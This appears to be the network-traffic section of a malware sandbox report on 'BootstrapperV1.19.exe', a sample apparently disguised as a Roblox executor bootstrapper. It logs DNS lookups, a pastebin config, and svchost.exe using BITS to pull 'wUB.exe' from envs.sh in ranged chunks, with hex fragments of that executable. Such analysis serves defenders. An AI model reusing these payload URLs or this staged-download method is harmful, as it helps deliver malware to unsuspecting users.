                                            Sep 16, 2024 12:22:30.842379093 CEST53654411.1.1.1192.168.2.4
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Sep 16, 2024 12:22:23.275859118 CEST192.168.2.41.1.1.10x4411Standard query (0)getsolara.devA (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:27.094228983 CEST192.168.2.41.1.1.10x504aStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:27.934755087 CEST192.168.2.41.1.1.10x4753Standard query (0)envs.shA (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:28.006108046 CEST192.168.2.41.1.1.10xd4f7Standard query (0)clientsettings.roblox.comA (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:30.835216045 CEST192.168.2.41.1.1.10x26e1Standard query (0)www.nodejs.orgA (IP address)IN (0x0001)false
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Sep 16, 2024 12:22:23.283305883 CEST1.1.1.1192.168.2.40x4411No error (0)getsolara.dev104.21.93.27A (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:23.283305883 CEST1.1.1.1192.168.2.40x4411No error (0)getsolara.dev172.67.203.125A (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:27.101197004 CEST1.1.1.1192.168.2.40x504aNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:27.101197004 CEST1.1.1.1192.168.2.40x504aNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:27.101197004 CEST1.1.1.1192.168.2.40x504aNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:27.981240034 CEST1.1.1.1192.168.2.40x4753No error (0)envs.sh89.163.145.170A (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:28.014050961 CEST1.1.1.1192.168.2.40xd4f7No error (0)clientsettings.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                            Sep 16, 2024 12:22:28.014050961 CEST1.1.1.1192.168.2.40xd4f7No error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                            Sep 16, 2024 12:22:28.014050961 CEST1.1.1.1192.168.2.40xd4f7No error (0)edge-term4.roblox.comedge-term4-lhr2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                            Sep 16, 2024 12:22:28.014050961 CEST1.1.1.1192.168.2.40xd4f7No error (0)edge-term4-lhr2.roblox.com128.116.119.3A (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:30.842379093 CEST1.1.1.1192.168.2.40x26e1No error (0)www.nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                            Sep 16, 2024 12:22:30.842379093 CEST1.1.1.1192.168.2.40x26e1No error (0)www.nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                            • getsolara.dev
                                            • pastebin.com
                                            • clientsettings.roblox.com
                                            • envs.sh
                                            • www.nodejs.org
                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449731104.21.93.274436516C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:24 UTC63OUTGET / HTTP/1.1
                                            Host: getsolara.dev
                                            Connection: Keep-Alive
                                            2024-09-16 10:22:24 UTC577INHTTP/1.1 200 OK
                                            Date: Mon, 16 Sep 2024 10:22:24 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            X-Frame-Options: SAMEORIGIN
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VT2Wdavp2rM9pZ8vNZfntRVSSywd5WuJjSMMbZ24SczMo4kclIHzKa%2BphjqwuBGVmNEKnLD0S%2FzeU4VKTcAOA4ZZpsY3IrFIl104woYh8KIDexoiYrm5HD7deAJVzZBX"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Strict-Transport-Security: max-age=0
                                            Server: cloudflare
                                            CF-RAY: 8c402298dde015d7-EWR
                                            2024-09-16 10:22:24 UTC792INData Raw: 31 31 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                            Data Ascii: 112a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                            2024-09-16 10:22:24 UTC1369INData Raw: 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63
                                            Data Ascii: ss' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = doc
                                            2024-09-16 10:22:24 UTC1369INData Raw: 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 50 31 78 64 67 31 61 54 73 65 62 39 76 4e 74 72 38 77 56 77 45 6f 33 39 39 41 39 53 63 70 35 6a 4e 38 69 66 43 31 35 64 72 6c 4d 2d 31 37 32 36 34 38 32 31 34 34 2d 30 2e 30 2e 31 2e 31 2d 2f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74
                                            Data Ascii: enctype="text/plain"> <input type="hidden" name="atok" value="P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/"> <a href="https://www.cloudflare.com/learning/access-management/phishing-att
                                            2024-09-16 10:22:24 UTC872INData Raw: 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74
                                            Data Ascii: ="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target
                                            2024-09-16 10:22:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.449734104.21.93.274436516C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:24 UTC151OUTGET /asset/discord.json HTTP/1.1
                                            Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/
                                            Host: getsolara.dev
                                            2024-09-16 10:22:25 UTC831INHTTP/1.1 200 OK
                                            Date: Mon, 16 Sep 2024 10:22:24 GMT
                                            Content-Type: application/json
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Access-Control-Allow-Origin: *
                                            Cache-Control: public, max-age=0, must-revalidate
                                            ETag: W/"e1d895c526c3cd0cc3c6c0e3e7022f52"
                                            referrer-policy: strict-origin-when-cross-origin
                                            x-content-type-options: nosniff
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GNp%2B0TQ4sON8EZR5Mf0mTkOve0phrEaQldvlS1HYFUVPmxdCszlSju32PSK5MJUNeFG0GRkQ7z9%2BDaFgoIH4Q0GAwIjTnq3TbzYsDR4gRKdSpHqPFaxKJpdqo6%2FGryzA"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Vary: Accept-Encoding
                                            CF-Cache-Status: DYNAMIC
                                            Strict-Transport-Security: max-age=0
                                            Server: cloudflare
                                            CF-RAY: 8c40229ddfb04332-EWR
                                            alt-svc: h3=":443"; ma=86400
                                            2024-09-16 10:22:25 UTC109INData Raw: 36 37 0d 0a 7b 0a 20 20 20 20 22 61 72 67 73 22 20 3a 20 7b 0a 20 20 20 20 20 20 20 22 63 6f 64 65 22 20 3a 20 22 78 52 43 61 43 37 63 64 42 6e 22 0a 20 20 20 20 7d 2c 0a 20 20 20 20 22 63 6d 64 22 20 3a 20 22 49 4e 56 49 54 45 5f 42 52 4f 57 53 45 52 22 2c 0a 20 20 20 20 22 6e 6f 6e 63 65 22 20 3a 20 22 2e 22 0a 20 7d 0d 0a
                                            Data Ascii: 67{ "args" : { "code" : "xRCaC7cdBn" }, "cmd" : "INVITE_BROWSER", "nonce" : "." }
                                            2024-09-16 10:22:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449737104.20.4.2354436516C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:27 UTC168OUTGET /raw/pjseRvyK HTTP/1.1
                                            Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            2024-09-16 10:22:27 UTC398INHTTP/1.1 200 OK
                                            Date: Mon, 16 Sep 2024 10:22:27 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            x-frame-options: DENY
                                            x-content-type-options: nosniff
                                            x-xss-protection: 1;mode=block
                                            cache-control: public, max-age=1801
                                            CF-Cache-Status: HIT
                                            Age: 1695
                                            Last-Modified: Mon, 16 Sep 2024 09:54:12 GMT
                                            Server: cloudflare
                                            CF-RAY: 8c4022aefe0078e1-EWR
                                            2024-09-16 10:22:27 UTC562INData Raw: 32 32 62 0d 0a 7b 0d 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 20 22 31 2e 31 39 22 2c 0d 0a 20 20 20 20 22 53 75 70 70 6f 72 74 65 64 43 6c 69 65 6e 74 22 3a 20 22 76 65 72 73 69 6f 6e 2d 34 33 61 64 31 38 35 33 61 64 39 31 34 32 37 64 22 2c 0d 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 56 65 72 73 69 6f 6e 22 3a 20 22 33 2e 31 31 33 22 2c 0d 0a 20 20 20 20 22 42 6f 6f 74 73 74 72 61 70 70 65 72 55 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 79 70 65 73 68 69 31 32 2f 65 6e 64 2f 72 65 6c 65 61 73 65 73 2f 64 6f 77 6e 6c 6f 61 64 2f 72 65 2f 42 6f 6f 74 73 74 72 61 70 70 65 72 2e 65 78 65 22 2c 0d 0a 20 20 20 20 22 53 6f 66 74 77 61 72 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 67
                                            Data Ascii: 22b{ "BootstrapperVersion": "1.19", "SupportedClient": "version-43ad1853ad91427d", "SoftwareVersion": "3.113", "BootstrapperUrl": "https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe", "SoftwareUrl":"https://g
                                            2024-09-16 10:22:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.449739128.116.119.34436516C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:28 UTC213OUTGET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1
                                            Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/
                                            Host: clientsettings.roblox.com
                                            Connection: Keep-Alive
                                            2024-09-16 10:22:29 UTC576INHTTP/1.1 200 OK
                                            content-length: 119
                                            content-type: application/json; charset=utf-8
                                            date: Mon, 16 Sep 2024 10:22:28 GMT
                                            server: Kestrel
                                            cache-control: no-cache
                                            strict-transport-security: max-age=3600
                                            x-frame-options: SAMEORIGIN
                                            roblox-machine-id: c0893d27-7be0-f1d5-aa53-d7db1f83ae0e
                                            x-roblox-region: us-central_rbx
                                            x-roblox-edge: lhr2
                                            report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://ncs.roblox.com/upload"}]}
                                            nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1}
                                            connection: close
                                            2024-09-16 10:22:29 UTC119INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 30 2e 36 34 32 2e 30 2e 36 34 32 30 36 33 36 22 2c 22 63 6c 69 65 6e 74 56 65 72 73 69 6f 6e 55 70 6c 6f 61 64 22 3a 22 76 65 72 73 69 6f 6e 2d 34 33 61 64 31 38 35 33 61 64 39 31 34 32 37 64 22 2c 22 62 6f 6f 74 73 74 72 61 70 70 65 72 56 65 72 73 69 6f 6e 22 3a 22 31 2c 20 36 2c 20 30 2c 20 36 34 32 30 36 33 36 22 7d
                                            Data Ascii: {"version":"0.642.0.6420636","clientVersionUpload":"version-43ad1853ad91427d","bootstrapperVersion":"1, 6, 0, 6420636"}


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.44973889.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:28 UTC137OUTHEAD /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:28 UTC395INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:28 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 80384
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Accept-Ranges: bytes


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.44974089.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:30 UTC209OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=0-1119
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:30 UTC420INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:30 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 1120
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 0-1119/80384
                                            2024-09-16 10:22:30 UTC1120INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7f 1f e7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 30 01 00 00 08 00 00 00 00 00 00 1e 4f 01 00 00 20 00 00 00 60 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELf0O `@ @


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.449741104.20.23.464436516C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:31 UTC193OUTGET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1
                                            Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/
                                            Host: www.nodejs.org
                                            Connection: Keep-Alive
                                            2024-09-16 10:22:31 UTC497INHTTP/1.1 307 Temporary Redirect
                                            Date: Mon, 16 Sep 2024 10:22:31 GMT
                                            Content-Type: text/plain
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: public, max-age=0, must-revalidate
                                            location: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                            x-vercel-id: iad1::vtdxh-1726482151642-24b5217e14b8
                                            CF-Cache-Status: DYNAMIC
                                            X-Content-Type-Options: nosniff
                                            Server: cloudflare
                                            CF-RAY: 8c4022c63d204370-EWR
                                            2024-09-16 10:22:31 UTC20INData Raw: 66 0d 0a 52 65 64 69 72 65 63 74 69 6e 67 2e 2e 2e 0a 0d 0a
                                            Data Ascii: fRedirecting...
                                            2024-09-16 10:22:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.44974489.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:35 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=1120-1323
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:35 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:35 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 204
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 1120-1323/80384
                                            2024-09-16 10:22:35 UTC204INData Raw: 80 1a 00 00 04 2a 32 7e 07 00 00 04 28 55 00 00 06 26 2a 22 28 64 00 00 06 2b 00 2a 3a 02 74 08 00 00 1b 28 5f 00 00 06 2b 00 2a 1a 72 54 0c 00 70 2a 1a 20 2a 70 7b 01 2a 1a 72 82 0c 00 70 2a 1a 72 b0 0c 00 70 2a 1a 72 de 0c 00 70 2a 1a 72 0c 0d 00 70 2a 1a 20 0c a8 3e 04 2a 1a 72 3a 0d 00 70 2a 1a 20 80 a8 6f 04 2a 1a 72 68 0d 00 70 2a 1a 20 04 88 13 04 2a 1a 72 96 0d 00 70 2a 1a 72 c4 0d 00 70 2a 1a 20 74 1c 45 03 2a 1a 72 f2 0d 00 70 2a 1a 20 26 23 77 05 2a 1a 72 20 0e 00 70 2a 1a 72 4e 0e 00 70 2a 1a 20 df 69 89 05 2a 1a 72 7c 0e 00 70 2a 1a 20 45 2f 8d 02 2a 1a 72 aa 0e 00 70 2a 1a 20 ee 2f 0b 01 2a
                                            Data Ascii: *2~(U&*"(d+*:t(_+*rTp* *p{*rp*rp*rp*rp* >*r:p* o*rhp* *rp*rp* tE*rp* &#w*r p*rNp* i*r|p* E/*rp* /*


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.44974789.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:36 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=1324-1593
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:36 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:36 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 270
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 1324-1593/80384
                                            2024-09-16 10:22:36 UTC270INData Raw: 1a 72 d8 0e 00 70 2a 1a 72 06 0f 00 70 2a 1a 72 34 0f 00 70 2a 1a 20 1c a9 05 02 2a 1a 72 62 0f 00 70 2a 1a 72 90 0f 00 70 2a 1a 20 a4 e6 3f 02 2a 1a 72 be 0f 00 70 2a 1a 20 d9 60 8e 04 2a 1a 72 ec 0f 00 70 2a 1a 20 85 81 da 05 2a 42 7e 1a 00 00 04 28 22 00 00 0a 80 1e 00 00 04 2a 3a 02 28 2d 00 00 0a 28 97 00 00 06 2b 00 2a 3a 02 28 2d 00 00 0a 28 98 00 00 06 2b 00 2a 1a 72 3e 14 00 70 2a 1a 72 6c 14 00 70 2a 1a 20 72 a3 64 02 2a 1a 72 9a 14 00 70 2a 1a 20 6d 33 6b 03 2a 1a 72 c8 14 00 70 2a 1a 20 9d 63 3d 01 2a 1a 72 f6 14 00 70 2a 1a 20 ec da 99 00 2a 1a 72 24 15 00 70 2a 1a 20 11 e5 33 03 2a 1a 72 52 15 00 70 2a 1a 72 80 15 00 70 2a 1a 20 48 14 70 00 2a 1a 72 ae 15 00 70 2a 1a 72 dc 15 00 70 2a 1a 72 0a 16 00 70 2a 1a 20 41 62 7f 05 2a 1a 72 38 16 00
                                            Data Ascii: rp*rp*r4p* *rbp*rp* ?*rp* `*rp* *B~("*:(-(+*:(-(+*r>p*rlp* rd*rp* m3k*rp* c=*rp* *r$p* 3*rRp*rp* Hp*rp*rp*rp* Ab*r8


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.44975189.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:39 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
                                            If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT
                                            Range: bytes=1594-2051
                                            User-Agent: Microsoft BITS/7.8
                                            Host: envs.sh
                                            2024-09-16 10:22:39 UTC422INHTTP/1.1 206 Partial Content
                                            Server: nginx/1.18.0
                                            Date: Mon, 16 Sep 2024 10:22:39 GMT
                                            Content-Type: application/x-msdownload
                                            Content-Length: 458
                                            Connection: close
                                            Last-Modified: Sun, 15 Sep 2024 18:01:56 GMT
                                            ETag: "66e72114-13a00"
                                            Strict-Transport-Security: max-age=63072000; preload
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            X-Frame-Options: DENY
                                            Content-Range: bytes 1594-2051/80384
                                            2024-09-16 10:22:39 UTC458INData Raw: 2a 1a 72 c2 16 00 70 2a 1a 20 9f 26 c7 02 2a 1a 72 f0 16 00 70 2a 1a 72 09 19 00 70 2a 1a 20 fa b3 e9 02 2a 1a 72 37 19 00 70 2a 1a 72 49 1c 00 70 2a 1a 20 14 41 e5 02 2a 1a 72 77 1c 00 70 2a 1a 20 5b e9 78 02 2a 1a 72 a5 1c 00 70 2a 1a 72 d3 1c 00 70 2a 1a 20 12 50 84 01 2a 8e 14 fe 06 d9 00 00 06 73 0b 01 00 06 80 29 00 00 04 7e 1f 01 00 0a 80 2a 00 00 04 1f 0d 80 2b 00 00 04 2a 56 7e 29 00 00 04 28 d8 00 00 06 80 2a 00 00 04 28 20 01 00 0a 2a 1a 72 c5 1e 00 70 2a 1a 20 6d 13 f0 04 2a 1a 72 f3 1e 00 70 2a 1a 72 21 1f 00 70 2a 1a 20 20 96 ca 04 2a 1a 72 4f 1f 00 70 2a 1a 20 cb f7 57 04 2a 1a 72 7d 1f 00 70 2a 1a 72 ab 1f 00 70 2a 1a 20 6d d4 60 02 2a 1a 72 d9 1f 00 70 2a 1a 20 04 e0 e7 04 2a 1a 72 07 20 00 70 2a 1a 20 e6 b6 69 05 2a 1a 72 35 20 00 70 2a
                                            Data Ascii: *rp* &*rp*rp* *r7p*rIp* A*rwp* [x*rp*rp* P*s)~*+*V~)(*( *rp* m*rp*r!p* *rOp* W*r}p*rp* m`*rp* *r p* i*r5 p*


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.44975389.163.145.1704432708C:\Windows\System32\svchost.exe
                                            TimestampBytes transferredDirectionData
                                            2024-09-16 10:22:41 UTC212OUTGET /wUB.exe HTTP/1.1
                                            Connection: Keep-Alive
                                            Accept: */*
                                            Accept-Encoding: identity
